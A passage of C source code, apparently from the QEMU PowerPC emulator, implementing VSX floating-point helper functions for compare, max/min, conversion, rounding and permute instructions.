float64, VsrD(0), NMADD_FLGS, 1, 1) VSX_MADD(xsnmsubsp, 1, float64, VsrD(0), NMSUB_FLGS, 1, 1) VSX_MADD(xvmadddp, 2, float64, VsrD(i), MADD_FLGS, 0, 0) VSX_MADD(xvmsubdp, 2, float64, VsrD(i), MSUB_FLGS, 0, 0) VSX_MADD(xvnmadddp, 2, float64, VsrD(i), NMADD_FLGS, 0, 0) VSX_MADD(xvnmsubdp, 2, float64, VsrD(i), NMSUB_FLGS, 0, 0) VSX_MADD(xvmaddsp, 4, float32, VsrW(i), MADD_FLGS, 0, 0) VSX_MADD(xvmsubsp, 4, float32, VsrW(i), MSUB_FLGS, 0, 0) VSX_MADD(xvnmaddsp, 4, float32, VsrW(i), NMADD_FLGS, 0, 0) VSX_MADD(xvnmsubsp, 4, float32, VsrW(i), NMSUB_FLGS, 0, 0) /* * VSX_SCALAR_CMP_DP - VSX scalar floating point compare double precision * op - instruction mnemonic * cmp - comparison operation * exp - expected result of comparison * svxvc - set VXVC bit */ #define VSX_SCALAR_CMP_DP(op, cmp, exp, svxvc) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ bool vxsnan_flag = false, vxvc_flag = false, vex_flag = false; \ \ if (float64_is_signaling_nan(xa->VsrD(0), &env->fp_status) || \ float64_is_signaling_nan(xb->VsrD(0), &env->fp_status)) { \ vxsnan_flag = true; \ if (fpscr_ve == 0 && svxvc) { \ vxvc_flag = true; \ } \ } else if (svxvc) { \ vxvc_flag = float64_is_quiet_nan(xa->VsrD(0), &env->fp_status) || \ float64_is_quiet_nan(xb->VsrD(0), &env->fp_status); \ } \ if (vxsnan_flag) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (vxvc_flag) { \ float_invalid_op_vxvc(env, 0, GETPC()); \ } \ vex_flag = fpscr_ve && (vxvc_flag || vxsnan_flag); \ \ if (!vex_flag) { \ if (float64_##cmp(xb->VsrD(0), xa->VsrD(0), \ &env->fp_status) == exp) { \ t.VsrD(0) = -1; \ t.VsrD(1) = 0; \ } else { \ t.VsrD(0) = 0; \ t.VsrD(1) = 0; \ } \ } \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_SCALAR_CMP_DP(xscmpeqdp, eq, 1, 0) VSX_SCALAR_CMP_DP(xscmpgedp, le, 1, 1) VSX_SCALAR_CMP_DP(xscmpgtdp, lt, 1, 1) VSX_SCALAR_CMP_DP(xscmpnedp, eq, 0, 0) void helper_xscmpexpdp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xa, ppc_vsr_t *xb) { int64_t exp_a, exp_b; uint32_t cc; exp_a = extract64(xa->VsrD(0), 52, 11); exp_b = extract64(xb->VsrD(0), 52, 11); if (unlikely(float64_is_any_nan(xa->VsrD(0)) || float64_is_any_nan(xb->VsrD(0)))) { cc = CRF_SO; } else { if (exp_a < exp_b) { cc = CRF_LT; } else if (exp_a > exp_b) { cc = CRF_GT; } else { cc = CRF_EQ; } } env->fpscr &= ~FP_FPCC; env->fpscr |= cc << FPSCR_FPCC; env->crf[BF(opcode)] = cc; do_float_check_status(env, GETPC()); } void helper_xscmpexpqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xa, ppc_vsr_t *xb) { int64_t exp_a, exp_b; uint32_t cc; exp_a = extract64(xa->VsrD(0), 48, 15); exp_b = extract64(xb->VsrD(0), 48, 15); if (unlikely(float128_is_any_nan(xa->f128) || float128_is_any_nan(xb->f128))) { cc = CRF_SO; } else { if (exp_a < exp_b) { cc = CRF_LT; } else if (exp_a > exp_b) { cc = CRF_GT; } else { cc = CRF_EQ; } } env->fpscr &= ~FP_FPCC; env->fpscr |= cc << FPSCR_FPCC; env->crf[BF(opcode)] = cc; do_float_check_status(env, GETPC()); } #define VSX_SCALAR_CMP(op, ordered) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ uint32_t cc = 0; \ bool vxsnan_flag = false, vxvc_flag = false; \ \ helper_reset_fpstatus(env); \ \ if (float64_is_signaling_nan(xa->VsrD(0), &env->fp_status) || \ float64_is_signaling_nan(xb->VsrD(0), &env->fp_status)) { \ vxsnan_flag = true; \ cc = CRF_SO; \ if (fpscr_ve == 0 && ordered) { \ vxvc_flag = true; \ } \ } else if (float64_is_quiet_nan(xa->VsrD(0), &env->fp_status) || \ float64_is_quiet_nan(xb->VsrD(0), &env->fp_status)) { \ cc = CRF_SO; \ if (ordered) { \ vxvc_flag = true; \ } \ } \ if (vxsnan_flag) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (vxvc_flag) { \ float_invalid_op_vxvc(env, 0, GETPC()); \ } \ \ if (float64_lt(xa->VsrD(0), xb->VsrD(0), &env->fp_status)) { \ cc |= CRF_LT; \ } else if (!float64_le(xa->VsrD(0), xb->VsrD(0), &env->fp_status)) { \ cc |= CRF_GT; \ } else { \ cc |= CRF_EQ; \ } \ \ env->fpscr &= ~FP_FPCC; \ env->fpscr |= cc << FPSCR_FPCC; \ env->crf[BF(opcode)] = cc; \ \ do_float_check_status(env, GETPC()); \ } VSX_SCALAR_CMP(xscmpodp, 1) VSX_SCALAR_CMP(xscmpudp, 0) #define VSX_SCALAR_CMPQ(op, ordered) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ uint32_t cc = 0; \ bool vxsnan_flag = false, vxvc_flag = false; \ \ helper_reset_fpstatus(env); \ \ if (float128_is_signaling_nan(xa->f128, &env->fp_status) || \ float128_is_signaling_nan(xb->f128, &env->fp_status)) { \ vxsnan_flag = true; \ cc = CRF_SO; \ if (fpscr_ve == 0 && ordered) { \ vxvc_flag = true; \ } \ } else if (float128_is_quiet_nan(xa->f128, &env->fp_status) || \ float128_is_quiet_nan(xb->f128, &env->fp_status)) { \ cc = CRF_SO; \ if (ordered) { \ vxvc_flag = true; \ } \ } \ if (vxsnan_flag) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (vxvc_flag) { \ float_invalid_op_vxvc(env, 0, GETPC()); \ } \ \ if (float128_lt(xa->f128, xb->f128, &env->fp_status)) { \ cc |= CRF_LT; \ } else if (!float128_le(xa->f128, xb->f128, &env->fp_status)) { \ cc |= CRF_GT; \ } else { \ cc |= CRF_EQ; \ } \ \ env->fpscr &= ~FP_FPCC; \ env->fpscr |= cc << FPSCR_FPCC; \ env->crf[BF(opcode)] = cc; \ \ do_float_check_status(env, GETPC()); \ } VSX_SCALAR_CMPQ(xscmpoqp, 1) VSX_SCALAR_CMPQ(xscmpuqp, 0) /* * VSX_MAX_MIN - VSX floating point maximum/minimum * name - instruction mnemonic * op - operation (max or min) * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) */ #define VSX_MAX_MIN(name, op, nels, tp, fld) \ void helper_##name(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ for (i = 0; i < nels; i++) { \ t.fld = tp##_##op(xa->fld, xb->fld, &env->fp_status); \ if (unlikely(tp##_is_signaling_nan(xa->fld, &env->fp_status) || \ tp##_is_signaling_nan(xb->fld, &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_MAX_MIN(xsmaxdp, maxnum, 1, float64, VsrD(0)) VSX_MAX_MIN(xvmaxdp, maxnum, 2, float64, VsrD(i)) VSX_MAX_MIN(xvmaxsp, maxnum, 4, float32, VsrW(i)) VSX_MAX_MIN(xsmindp, minnum, 1, float64, VsrD(0)) VSX_MAX_MIN(xvmindp, minnum, 2, float64, VsrD(i)) VSX_MAX_MIN(xvminsp, minnum, 4, float32, VsrW(i)) #define VSX_MAX_MINC(name, max) \ void helper_##name(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ bool vxsnan_flag = false, vex_flag = false; \ \ if (unlikely(float64_is_any_nan(xa->VsrD(0)) || \ float64_is_any_nan(xb->VsrD(0)))) { \ if (float64_is_signaling_nan(xa->VsrD(0), &env->fp_status) || \ float64_is_signaling_nan(xb->VsrD(0), &env->fp_status)) { \ vxsnan_flag = true; \ } \ t.VsrD(0) = xb->VsrD(0); \ } else if ((max && \ !float64_lt(xa->VsrD(0), xb->VsrD(0), &env->fp_status)) || \ (!max && \ float64_lt(xa->VsrD(0), xb->VsrD(0), &env->fp_status))) { \ t.VsrD(0) = xa->VsrD(0); \ } else { \ t.VsrD(0) = xb->VsrD(0); \ } \ \ vex_flag = fpscr_ve & vxsnan_flag; \ if (vxsnan_flag) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (!vex_flag) { \ *xt = t; \ } \ } \ VSX_MAX_MINC(xsmaxcdp, 1); VSX_MAX_MINC(xsmincdp, 0); #define VSX_MAX_MINJ(name, max) \ void helper_##name(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ bool vxsnan_flag = false, vex_flag = false; \ \ if (unlikely(float64_is_any_nan(xa->VsrD(0)))) { \ if (float64_is_signaling_nan(xa->VsrD(0), &env->fp_status)) { \ vxsnan_flag = true; \ } \ t.VsrD(0) = xa->VsrD(0); \ } else if (unlikely(float64_is_any_nan(xb->VsrD(0)))) { \ if (float64_is_signaling_nan(xb->VsrD(0), &env->fp_status)) { \ vxsnan_flag = true; \ } \ t.VsrD(0) = xb->VsrD(0); \ } else if (float64_is_zero(xa->VsrD(0)) && \ float64_is_zero(xb->VsrD(0))) { \ if (max) { \ if (!float64_is_neg(xa->VsrD(0)) || \ !float64_is_neg(xb->VsrD(0))) { \ t.VsrD(0) = 0ULL; \ } else { \ t.VsrD(0) = 0x8000000000000000ULL; \ } \ } else { \ if (float64_is_neg(xa->VsrD(0)) || \ float64_is_neg(xb->VsrD(0))) { \ t.VsrD(0) = 0x8000000000000000ULL; \ } else { \ t.VsrD(0) = 0ULL; \ } \ } \ } else if ((max && \ !float64_lt(xa->VsrD(0), xb->VsrD(0), &env->fp_status)) || \ (!max && \ float64_lt(xa->VsrD(0), xb->VsrD(0), &env->fp_status))) { \ t.VsrD(0) = xa->VsrD(0); \ } else { \ t.VsrD(0) = xb->VsrD(0); \ } \ \ vex_flag = fpscr_ve & vxsnan_flag; \ if (vxsnan_flag) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (!vex_flag) { \ *xt = t; \ } \ } \ VSX_MAX_MINJ(xsmaxjdp, 1); VSX_MAX_MINJ(xsminjdp, 0); /* * VSX_CMP - VSX floating point compare * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * cmp - comparison operation * svxvc - set VXVC bit * exp - expected result of comparison */ #define VSX_CMP(op, nels, tp, fld, cmp, svxvc, exp) \ uint32_t helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ uint32_t crf6 = 0; \ int i; \ int all_true = 1; \ int all_false = 1; \ \ for (i = 0; i < nels; i++) { \ if (unlikely(tp##_is_any_nan(xa->fld) || \ tp##_is_any_nan(xb->fld))) { \ if (tp##_is_signaling_nan(xa->fld, &env->fp_status) || \ tp##_is_signaling_nan(xb->fld, &env->fp_status)) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (svxvc) { \ float_invalid_op_vxvc(env, 0, GETPC()); \ } \ t.fld = 0; \ all_true = 0; \ } else { \ if (tp##_##cmp(xb->fld, xa->fld, &env->fp_status) == exp) { \ t.fld = -1; \ all_false = 0; \ } else { \ t.fld = 0; \ all_true = 0; \ } \ } \ } \ \ *xt = t; \ crf6 = (all_true ? 0x8 : 0) | (all_false ? 0x2 : 0); \ return crf6; \ } VSX_CMP(xvcmpeqdp, 2, float64, VsrD(i), eq, 0, 1) VSX_CMP(xvcmpgedp, 2, float64, VsrD(i), le, 1, 1) VSX_CMP(xvcmpgtdp, 2, float64, VsrD(i), lt, 1, 1) VSX_CMP(xvcmpnedp, 2, float64, VsrD(i), eq, 0, 0) VSX_CMP(xvcmpeqsp, 4, float32, VsrW(i), eq, 0, 1) VSX_CMP(xvcmpgesp, 4, float32, VsrW(i), le, 1, 1) VSX_CMP(xvcmpgtsp, 4, float32, VsrW(i), lt, 1, 1) VSX_CMP(xvcmpnesp, 4, float32, VsrW(i), eq, 0, 0) /* * VSX_CVT_FP_TO_FP - VSX floating point/floating point conversion * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * stp - source type (float32 or float64) * ttp - target type (float32 or float64) * sfld - source vsr_t field * tfld - target vsr_t field (f32 or f64) * sfprf - set FPRF */ #define VSX_CVT_FP_TO_FP(op, nels, stp, ttp, sfld, tfld, sfprf) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ for (i = 0; i < nels; i++) { \ t.tfld = stp##_to_##ttp(xb->sfld, &env->fp_status); \ if (unlikely(stp##_is_signaling_nan(xb->sfld, \ &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ t.tfld = ttp##_snan_to_qnan(t.tfld); \ } \ if (sfprf) { \ helper_compute_fprf_##ttp(env, t.tfld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_FP_TO_FP(xscvdpsp, 1, float64, float32, VsrD(0), VsrW(0), 1) VSX_CVT_FP_TO_FP(xscvspdp, 1, float32, float64, VsrW(0), VsrD(0), 1) VSX_CVT_FP_TO_FP(xvcvdpsp, 2, float64, float32, VsrD(i), VsrW(2 * i), 0) VSX_CVT_FP_TO_FP(xvcvspdp, 2, float32, float64, VsrW(2 * i), VsrD(i), 0) /* * VSX_CVT_FP_TO_FP_VECTOR - VSX floating point/floating point conversion * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * stp - source type (float32 or float64) * ttp - target type (float32 or float64) * sfld - source vsr_t field * tfld - target vsr_t field (f32 or f64) * sfprf - set FPRF */ #define VSX_CVT_FP_TO_FP_VECTOR(op, nels, stp, ttp, sfld, tfld, sfprf) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ for (i = 0; i < nels; i++) { \ t.tfld = stp##_to_##ttp(xb->sfld, &env->fp_status); \ if (unlikely(stp##_is_signaling_nan(xb->sfld, \ &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ t.tfld = ttp##_snan_to_qnan(t.tfld); \ } \ if (sfprf) { \ helper_compute_fprf_##ttp(env, t.tfld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_FP_TO_FP_VECTOR(xscvdpqp, 1, float64, float128, VsrD(0), f128, 1) /* * VSX_CVT_FP_TO_FP_HP - VSX floating point/floating point conversion * involving one half precision value * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * stp - source type * ttp - target type * sfld - source vsr_t field * tfld - target vsr_t field * sfprf - set FPRF */ #define VSX_CVT_FP_TO_FP_HP(op, nels, stp, ttp, sfld, tfld, sfprf) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = { 0 }; \ int i; \ \ for (i = 0; i < nels; i++) { \ t.tfld = stp##_to_##ttp(xb->sfld, 1, &env->fp_status); \ if (unlikely(stp##_is_signaling_nan(xb->sfld, \ &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ t.tfld = ttp##_snan_to_qnan(t.tfld); \ } \ if (sfprf) { \ helper_compute_fprf_##ttp(env, t.tfld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_FP_TO_FP_HP(xscvdphp, 1, float64, float16, VsrD(0), VsrH(3), 1) VSX_CVT_FP_TO_FP_HP(xscvhpdp, 1, float16, float64, VsrH(3), VsrD(0), 1) VSX_CVT_FP_TO_FP_HP(xvcvsphp, 4, float32, float16, VsrW(i), VsrH(2 * i + 1), 0) VSX_CVT_FP_TO_FP_HP(xvcvhpsp, 4, float16, float32, VsrH(2 * i + 1), VsrW(i), 0) /* * xscvqpdp isn't using VSX_CVT_FP_TO_FP() because xscvqpdpo will be * added to this later. */ void helper_xscvqpdp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xb) { ppc_vsr_t t = { 0 }; float_status tstat; tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } t.VsrD(0) = float128_to_float64(xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(float128_is_signaling_nan(xb->f128, &tstat))) { float_invalid_op_vxsnan(env, GETPC()); t.VsrD(0) = float64_snan_to_qnan(t.VsrD(0)); } helper_compute_fprf_float64(env, t.VsrD(0)); *xt = t; do_float_check_status(env, GETPC()); } uint64_t helper_xscvdpspn(CPUPPCState *env, uint64_t xb) { uint64_t result, sign, exp, frac; float_status tstat = env->fp_status; set_float_exception_flags(0, &tstat); sign = extract64(xb, 63, 1); exp = extract64(xb, 52, 11); frac = extract64(xb, 0, 52) | 0x10000000000000ULL; if (unlikely(exp == 0 && extract64(frac, 0, 52) != 0)) { /* DP denormal operand. */ /* Exponent override to DP min exp. */ exp = 1; /* Implicit bit override to 0. */ frac = deposit64(frac, 53, 1, 0); } if (unlikely(exp < 897 && frac != 0)) { /* SP tiny operand. */ if (897 - exp > 63) { frac = 0; } else { /* Denormalize until exp = SP min exp. */ frac >>= (897 - exp); } /* Exponent override to SP min exp - 1. */ exp = 896; } result = sign << 31; result |= extract64(exp, 10, 1) << 30; result |= extract64(exp, 0, 7) << 23; result |= extract64(frac, 29, 23); /* hardware replicates result to both words of the doubleword result. */ return (result << 32) | result; } uint64_t helper_xscvspdpn(CPUPPCState *env, uint64_t xb) { float_status tstat = env->fp_status; set_float_exception_flags(0, &tstat); return float32_to_float64(xb >> 32, &tstat); } /* * VSX_CVT_FP_TO_INT - VSX floating point to integer conversion * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * stp - source type (float32 or float64) * ttp - target type (int32, uint32, int64 or uint64) * sfld - source vsr_t field * tfld - target vsr_t field * rnan - resulting NaN */ #define VSX_CVT_FP_TO_INT(op, nels, stp, ttp, sfld, tfld, rnan) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ int all_flags = env->fp_status.float_exception_flags, flags; \ ppc_vsr_t t = *xt; \ int i; \ \ for (i = 0; i < nels; i++) { \ env->fp_status.float_exception_flags = 0; \ t.tfld = stp##_to_##ttp##_round_to_zero(xb->sfld, &env->fp_status); \ flags = env->fp_status.float_exception_flags; \ if (unlikely(flags & float_flag_invalid)) { \ float_invalid_cvt(env, 0, GETPC(), stp##_classify(xb->sfld)); \ t.tfld = rnan; \ } \ all_flags |= flags; \ } \ \ *xt = t; \ env->fp_status.float_exception_flags = all_flags; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_FP_TO_INT(xscvdpsxds, 1, float64, int64, VsrD(0), VsrD(0), \ 0x8000000000000000ULL) VSX_CVT_FP_TO_INT(xscvdpsxws, 1, float64, int32, VsrD(0), VsrW(1), \ 0x80000000U) VSX_CVT_FP_TO_INT(xscvdpuxds, 1, float64, uint64, VsrD(0), VsrD(0), 0ULL) VSX_CVT_FP_TO_INT(xscvdpuxws, 1, float64, uint32, VsrD(0), VsrW(1), 0U) VSX_CVT_FP_TO_INT(xvcvdpsxds, 2, float64, int64, VsrD(i), VsrD(i), \ 0x8000000000000000ULL) VSX_CVT_FP_TO_INT(xvcvdpsxws, 2, float64, int32, VsrD(i), VsrW(2 * i), \ 0x80000000U) VSX_CVT_FP_TO_INT(xvcvdpuxds, 2, float64, uint64, VsrD(i), VsrD(i), 0ULL) VSX_CVT_FP_TO_INT(xvcvdpuxws, 2, float64, uint32, VsrD(i), VsrW(2 * i), 0U) VSX_CVT_FP_TO_INT(xvcvspsxds, 2, float32, int64, VsrW(2 * i), VsrD(i), \ 0x8000000000000000ULL) VSX_CVT_FP_TO_INT(xvcvspsxws, 4, float32, int32, VsrW(i), VsrW(i), 0x80000000U) VSX_CVT_FP_TO_INT(xvcvspuxds, 2, float32, uint64, VsrW(2 * i), VsrD(i), 0ULL) VSX_CVT_FP_TO_INT(xvcvspuxws, 4, float32, uint32, VsrW(i), VsrW(i), 0U) /* * VSX_CVT_FP_TO_INT_VECTOR - VSX floating point to integer conversion * op - instruction mnemonic * stp - source type (float32 or float64) * ttp - target type (int32, uint32, int64 or uint64) * sfld - source vsr_t field * tfld - target vsr_t field * rnan - resulting NaN */ #define VSX_CVT_FP_TO_INT_VECTOR(op, stp, ttp, sfld, tfld, rnan) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = { 0 }; \ \ t.tfld = stp##_to_##ttp##_round_to_zero(xb->sfld, &env->fp_status); \ if (env->fp_status.float_exception_flags & float_flag_invalid) { \ float_invalid_cvt(env, 0, GETPC(), stp##_classify(xb->sfld)); \ t.tfld = rnan; \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_FP_TO_INT_VECTOR(xscvqpsdz, float128, int64, f128, VsrD(0), \ 0x8000000000000000ULL) VSX_CVT_FP_TO_INT_VECTOR(xscvqpswz, float128, int32, f128, VsrD(0), \ 0xffffffff80000000ULL) VSX_CVT_FP_TO_INT_VECTOR(xscvqpudz, float128, uint64, f128, VsrD(0), 0x0ULL) VSX_CVT_FP_TO_INT_VECTOR(xscvqpuwz, float128, uint32, f128, VsrD(0), 0x0ULL) /* * VSX_CVT_INT_TO_FP - VSX integer to floating point conversion * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * stp - source type (int32, uint32, int64 or uint64) * ttp - target type (float32 or float64) * sfld - source vsr_t field * tfld - target vsr_t field * jdef - definition of the j index (i or 2*i) * sfprf - set FPRF */ #define VSX_CVT_INT_TO_FP(op, nels, stp, ttp, sfld, tfld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ for (i = 0; i < nels; i++) { \ t.tfld = stp##_to_##ttp(xb->sfld, &env->fp_status); \ if (r2sp) { \ t.tfld = helper_frsp(env, t.tfld); \ } \ if (sfprf) { \ helper_compute_fprf_float64(env, t.tfld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_INT_TO_FP(xscvsxddp, 1, int64, float64, VsrD(0), VsrD(0), 1, 0) VSX_CVT_INT_TO_FP(xscvuxddp, 1, uint64, float64, VsrD(0), VsrD(0), 1, 0) VSX_CVT_INT_TO_FP(xscvsxdsp, 1, int64, float64, VsrD(0), VsrD(0), 1, 1) VSX_CVT_INT_TO_FP(xscvuxdsp, 1, uint64, float64, VsrD(0), VsrD(0), 1, 1) VSX_CVT_INT_TO_FP(xvcvsxddp, 2, int64, float64, VsrD(i), VsrD(i), 0, 0) VSX_CVT_INT_TO_FP(xvcvuxddp, 2, uint64, float64, VsrD(i), VsrD(i), 0, 0) VSX_CVT_INT_TO_FP(xvcvsxwdp, 2, int32, float64, VsrW(2 * i), VsrD(i), 0, 0) VSX_CVT_INT_TO_FP(xvcvuxwdp, 2, uint64, float64, VsrW(2 * i), VsrD(i), 0, 0) VSX_CVT_INT_TO_FP(xvcvsxdsp, 2, int64, float32, VsrD(i), VsrW(2 * i), 0, 0) VSX_CVT_INT_TO_FP(xvcvuxdsp, 2, uint64, float32, VsrD(i), VsrW(2 * i), 0, 0) VSX_CVT_INT_TO_FP(xvcvsxwsp, 4, int32, float32, VsrW(i), VsrW(i), 0, 0) VSX_CVT_INT_TO_FP(xvcvuxwsp, 4, uint32, float32, VsrW(i), VsrW(i), 0, 0) /* * VSX_CVT_INT_TO_FP_VECTOR - VSX integer to floating point conversion * op - instruction mnemonic * stp - source type (int32, uint32, int64 or uint64) * ttp - target type (float32 or float64) * sfld - source vsr_t field * tfld - target vsr_t field */ #define VSX_CVT_INT_TO_FP_VECTOR(op, stp, ttp, sfld, tfld) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ \ t.tfld = stp##_to_##ttp(xb->sfld, &env->fp_status); \ helper_compute_fprf_##ttp(env, t.tfld); \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_CVT_INT_TO_FP_VECTOR(xscvsdqp, int64, float128, VsrD(0), f128) VSX_CVT_INT_TO_FP_VECTOR(xscvudqp, uint64, float128, VsrD(0), f128) /* * For "use current rounding mode", define a value that will not be * one of the existing rounding model enums. */ #define FLOAT_ROUND_CURRENT (float_round_nearest_even + float_round_down + \ float_round_up + float_round_to_zero) /* * VSX_ROUND - VSX floating point round * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * rmode - rounding mode * sfprf - set FPRF */ #define VSX_ROUND(op, nels, tp, fld, rmode, sfprf) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ if (rmode != FLOAT_ROUND_CURRENT) { \ set_float_rounding_mode(rmode, &env->fp_status); \ } \ \ for (i = 0; i < nels; i++) { \ if (unlikely(tp##_is_signaling_nan(xb->fld, \ &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ t.fld = tp##_snan_to_qnan(xb->fld); \ } else { \ t.fld = tp##_round_to_int(xb->fld, &env->fp_status); \ } \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ /* \ * If this is not a "use current rounding mode" instruction, \ * then inhibit setting of the XX bit and restore rounding \ * mode from FPSCR \ */ \ if (rmode != FLOAT_ROUND_CURRENT) { \ fpscr_set_rounding_mode(env); \ env->fp_status.float_exception_flags &= ~float_flag_inexact; \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_ROUND(xsrdpi, 1, float64, VsrD(0), float_round_ties_away, 1) VSX_ROUND(xsrdpic, 1, float64, VsrD(0), FLOAT_ROUND_CURRENT, 1) VSX_ROUND(xsrdpim, 1, float64, VsrD(0), float_round_down, 1) VSX_ROUND(xsrdpip, 1, float64, VsrD(0), float_round_up, 1) VSX_ROUND(xsrdpiz, 1, float64, VsrD(0), float_round_to_zero, 1) VSX_ROUND(xvrdpi, 2, float64, VsrD(i), float_round_ties_away, 0) VSX_ROUND(xvrdpic, 2, float64, VsrD(i), FLOAT_ROUND_CURRENT, 0) VSX_ROUND(xvrdpim, 2, float64, VsrD(i), float_round_down, 0) VSX_ROUND(xvrdpip, 2, float64, VsrD(i), float_round_up, 0) VSX_ROUND(xvrdpiz, 2, float64, VsrD(i), float_round_to_zero, 0) VSX_ROUND(xvrspi, 4, float32, VsrW(i), float_round_ties_away, 0) VSX_ROUND(xvrspic, 4, float32, VsrW(i), FLOAT_ROUND_CURRENT, 0) VSX_ROUND(xvrspim, 4, float32, VsrW(i), float_round_down, 0) VSX_ROUND(xvrspip, 4, float32, VsrW(i), float_round_up, 0) VSX_ROUND(xvrspiz, 4, float32, VsrW(i), float_round_to_zero, 0) uint64_t helper_xsrsp(CPUPPCState *env, uint64_t xb) { helper_reset_fpstatus(env); uint64_t xt = helper_frsp(env, xb); helper_compute_fprf_float64(env, xt); do_float_check_status(env, GETPC()); return xt; } #define VSX_XXPERM(op, indexed) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *pcv) \ { \ ppc_vsr_t t = *xt; \ int i, idx; \ \ for (i = 0; i < 16; i++) { \ idx = pcv->VsrB(i) & 0x1F; \ if (indexed) { \ idx = 31 - idx; \ } \ t.VsrB(i) = (idx <= 15) ? xa->VsrB(idx) \ : xt->VsrB(idx - 16); \ } \ *xt = t; \ } VSX_XXPERM(xxperm, 0) VSX_XXPERM(xxpermr, 1) void helper_xvxsigsp(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) { ppc_vsr_t t = { 0 }; uint32_t exp, i, fraction; for (i = 0; i < 4; i++) { exp = (xb->VsrW(i) >> 23) & 0xFF; fraction = xb->VsrW(i) & 0x7FFFFF; if (exp != 0 && exp != 255) { t.VsrW(i) = fraction | 0x00800000; } else { t.VsrW(i) = fraction; } } *xt = t; } /* * VSX_TEST_DC - VSX floating point test data class * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * xbn - VSR register number * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * tfld - target vsr_t field (VsrD(*) or VsrW(*)) * fld_max - target field max * scrf - set result in CR and FPCC */ #define VSX_TEST_DC(op, nels, xbn, tp, fld, tfld, fld_max, scrf) \ void helper_##op(CPUPPCState *env, uint32_t opcode) \ { \ ppc_vsr_t *xt = &env->vsr[xT(opcode)]; \ ppc_vsr_t *xb = &env->vsr[xbn]; \ ppc_vsr_t t = { 0 }; \ uint32_t i, sign, dcmx; \ uint32_t cc, match = 0; \ \ if (!scrf) { \ dcmx = DCMX_XV(opcode); \ } else { 